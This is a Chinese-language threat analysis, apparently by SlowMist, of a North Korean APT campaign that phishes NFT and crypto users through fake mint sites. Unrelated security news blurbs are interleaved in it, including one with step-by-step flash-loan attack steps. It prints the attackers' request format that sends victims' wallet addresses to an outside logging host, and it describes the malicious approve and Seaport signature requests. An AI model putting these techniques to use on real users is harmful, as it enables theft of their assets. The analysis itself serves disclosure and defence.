慢霧：朝鮮APT組織對NFT用戶大規模釣魚事件分析_BSP:Daily COP

9 月 4 日，推特用戶 Phantom X 發推稱朝鮮 APT 組織針對數十個 ETH 和 SOL 項目進行大規模的網絡釣魚活動。

（https://twitter.com/PhantomXSec/status/1566219671057371136 ）

該推特用戶給出了 196 個釣魚域名信息，分析后關聯到朝鮮黑客相關信息，具體的域名列表如下：

（https://pastebin.com/UV 9 pJN 2 M）

慢霧安全團隊注意到該事件并第一時間跟進深入分析：

（https://twitter.com/IM_ 23 pds/status/1566258373284093952 ）

由于朝鮮黑客針對加密貨幣行業的攻擊模型多樣化，我們披露的也只是冰山一角，因為一些保密的要求，本篇文章也僅針對其中一部分釣魚素材包括相關釣魚錢包地址進行分析。這里將重點針對 NFT 釣魚進行分析。

慢霧：過去一周Web3因安全事件損失約265萬美元:7月17日消息，慢霧發推稱，2023年7月10日至7月16日期間，Web3發生5起安全事件，總損失為265.5萬美元，包括Arcadia Finance、Rodeo Finance、LibertiVault、Platypus、Klever。[2023/7/17 10:59:08]

經過深入分析，發現此次釣魚的其中一種方式是發布虛假 NFT 相關的、帶有惡意 Mint 的誘餌網站，這些 NFT 在 OpenSea、X2Y2 和 Rarible 等平臺上都有出售。此次 APT 組織針對 Crypto 和 NFT 用戶的釣魚涉及將近 500 多個域名。

查詢這些域名的注冊相關信息，發現注冊日期最早可追溯到 7 個月前：

同時我們也發現朝鮮黑客常使用的一些獨有的釣魚特征：

特征一：釣魚網站都會記錄訪客數據并保存到外部站點。黑客通過 HTTP GET 請求將站點訪問者信息記錄到外部域，發送請求的域名雖不同但是請求的 API  接口都為 “/postAddr.php”。一般格式為 “https://nserva.live/postAddr.php? mmAddr=...[Metamask]...&accessTime=xxx&url=evil.site”，其中參數 mmAddr 記錄訪客的錢包地址，accessTime 記錄訪客的訪問時間，url 記錄訪客當前所訪問的釣魚網站鏈接。

慢霧：Platypus再次遭遇攻擊，套利者獲取約5萬美元收益:7月12日消息，SlowMist發推稱，穩定幣項目Platypus似乎再次收到攻擊。由于在通過CoverageRatio進行代幣交換時沒有考慮兩個池之間的價格差異，導致用戶可以通過存入USDC然后提取更多USDT來套利，套利者通過這種方式套利了大約50,000美元USDC。[2023/7/12 10:50:27]

特征二：釣魚網站會請求一個 NFT 項目價目表，通常 HTTP 的請求路徑為 “getPriceData.php”：

特征三：存在一個鏈接圖像到目標項目的文件 “imgSrc.js”，包含目標站點列表和在其相應網絡釣魚站點上使用的圖像文件的托管位置，這個文件可能是釣魚網站模板的一部分。

進一步分析發現 APT 用于監控用戶請求的主要域名為 “thedoodles.site”，此域名在 APT 活動早期主要用來記錄用戶數據：

慢霧：Grafana存在賬戶被接管和認證繞過漏洞:金色財經報道，據慢霧消息，Grafana發布嚴重安全提醒，其存在賬戶被接管和認證繞過漏洞(CVE-2023-3128)，目前PoC在互聯網上公開，已出現攻擊案例。Grafana是一個跨平臺、開源的數據可視化網絡應用程序平臺，用戶配置連接的數據源之后，Grafana可以在網絡瀏覽器里顯示數據圖表和警告。Grafana根據電子郵件的要求來驗證Azure Active Directory賬戶。在Azure AD上，配置文件的電子郵件字段在Azure AD租戶之間是不唯一的。當Azure AD OAuth與多租戶Azure AD OAuth應用配置在一起時，這可能會使Grafana賬戶被接管和認證繞過。其中，Grafana>=6.7.0受到影響。加密貨幣行業有大量平臺采用此方案用來監控服務器性能情況，請注意風險，并將Grafana升級到最新版本。[2023/6/25 21:58:31]

查詢該域名的 HTTPS 證書啟用時間是在 7 個月之前，黑客組織已經開始實施對 NFT 用戶對攻擊。

最后來看下黑客到底運行和部署了多少個釣魚站點：

比如最新的站點偽裝成世界杯主題：

慢霧：pGALA合約黑客已獲利430萬美元:11月4日消息，安全團隊慢霧在推特上表示，pGALA合約黑客已將大部分GALA兌換成13,000枚BNB，獲利超430萬美元，該地址仍有450億枚Gala，但不太可能兌現，因為資金池基本已耗盡。此外，黑客的初始資金來自幾個幣安賬戶。

今日早些時候消息，一個BNB Chain上地址在BNB Chain上地址憑空鑄造了超10億美元的pGALA代幣，并通過在PancakeSwap上售出獲利。pNetwork表示此為跨鏈橋配置錯誤所致，GALA跨鏈橋已暫停，請用戶不要在BNB Chain上DEX中交易pGALA。[2022/11/4 12:16:04]

繼續根據相關的 HTTPS 證書搜索得到相關的網站主機信息：

在一些主機地址中發現了黑客使用的各種攻擊腳本和統計受害者信息的 txt 文件。

這些文件記錄了受害者訪問記錄、授權情況、使用插件錢包的情況：

可以發現這些信息跟釣魚站點采集的訪客數據相吻合。

慢霧：yearn攻擊者利用閃電貸通過若干步驟完成獲利:2021年02月05日，據慢霧區情報，知名的鏈上機槍池yearnfinance的DAI策略池遭受攻擊，慢霧安全團隊第一時間跟進分析，并以簡訊的形式給大家分享細節，供大家參考：

1.攻擊者首先從dYdX和AAVE中使用閃電貸借出大量的ETH；

2.攻擊者使用從第一步借出的ETH在Compound中借出DAI和USDC；

3.攻擊者將第二部中的所有USDC和大部分的DAI存入到CurveDAI/USDC/USDT池中，這個時候由于攻擊者存入流動性巨大，其實已經控制CruveDAI/USDC/USDT的大部分流動性；

4.攻擊者從Curve池中取出一定量的USDT，使DAI/USDT/USDC的比例失衡，及DAI/（USDT&USDC)貶值；

5.攻擊者第三步將剩余的DAI充值進yearnDAI策略池中，接著調用yearnDAI策略池的earn函數，將充值的DAI以失衡的比例轉入CurveDAI/USDT/USDC池中，同時yearnDAI策略池將獲得一定量的3CRV代幣；

6.攻擊者將第4步取走的USDT重新存入CurveDAI/USDT/USDC池中，使DAI/USDT/USDC的比例恢復；

7.攻擊者觸發yearnDAI策略池的withdraw函數，由于yearnDAI策略池存入時用的是失衡的比例，現在使用正常的比例體現，DAI在池中的占比提升，導致同等數量的3CRV代幣能取回的DAI的數量會變少。這部分少取回的代幣留在了CurveDAI/USDC/USDT池中；

8.由于第三步中攻擊者已經持有了CurveDAI/USDC/USDT池中大部分的流動性，導致yearnDAI策略池未能取回的DAI將大部分分給了攻擊者9.重復上述3-8步驟5次，并歸還閃電貸，完成獲利。參考攻擊交易見原文鏈接。[2021/2/5 18:58:47]

其中還包括受害者 approve 記錄：

以及簽名數據 sigData 等，由于比較敏感此處不進行展示。

另外，統計發現主機相同 IP 下 NFT 釣魚站群，單獨一個 IP 下就有 372 個 NFT 釣魚站點：

另一個 IP 下也有 320 個 NFT 釣魚站群：

甚至包括朝鮮黑客在經營的一個 DeFi 平臺：

由于篇幅有限，此處不再贅述。

結合之前文章，我們對此次釣魚事件的核心代碼進行了分析。我們發現黑客釣魚涉及到 WETH、USDC、DAI、UNI 等多個地址協議。

下面代碼用于誘導受害者進行授權 NFT、ERC 20 等較常見的釣魚 Approve 操作：

除此之外，黑客還會誘導受害者進行 Seaport、Permit 等簽名。

下面是這種簽名的正常樣例，只是在釣魚網站中不是 “opensea.io” 這個域名。

我們在黑客留下的主機也發現了這些留存的簽名數據和 “Seaport” 的簽名數據特征一致。

由于這類型的簽名請求數據可以“離線存儲”，黑客在拿到大量的受害者簽名數據后批量化的上鏈轉移資產。

對釣魚網站及手法分析后，我們選取其中一個釣魚地址（0xC0fd...e0ca）進行分析。

可以看到這個地址已被 MistTrack 標記為高風險釣魚地址，交易數也還挺多。釣魚者共收到 1055 個 NFT，售出后獲利近 300 ETH。

往上溯源，該地址的初始資金來源于地址（0 x 2 e 0 a...DA 82 ）轉入的 4.97 ETH。往下溯源，則發現該地址有與其他被 MistTrack 標記為風險的地址有交互，以及有 5.7 ETH 轉入了 FixedFloat。

再來分析下初始資金來源地址（0 x 2 e 0 a...DA 82 ），目前收到約 6.5 ETH。初始資金來源于 Binance 轉入的 1.433 ETH。

同時，該地址也是與多個風險地址進行交互。

由于保密性和隱私性，本文僅針對其中一部分 NFT 釣魚素材進行分析，并提煉出朝鮮黑客的部分釣魚特征，當然，這只是冰山一角。慢霧在此建議，用戶需加強對安全知識的了解，進一步強化甄別網絡釣魚攻擊的能力等，避免遭遇此類攻擊。

Ps. 感謝 hip、ScamSniffer 提供的支持。

相關鏈接：

https://www.prevailion.com/what-wicked-webs-we-unweave

https://twitter.com/PhantomXSec/status/1566219671057371136 

https://twitter.com/evilcos/status/1603969894965317632 

慢霧科技

個人專欄

閱讀更多

金色財經 子木

金色早8點

去中心化金融社區

虎嗅科技

區塊律動BlockBeats

CertiK中文社區

深潮TechFlow

念青

Odaily星球日報

騰訊研究院

Tags：BSPNBSUSDDAIBSP價格NBS幣USDC幣Daily COP

中幣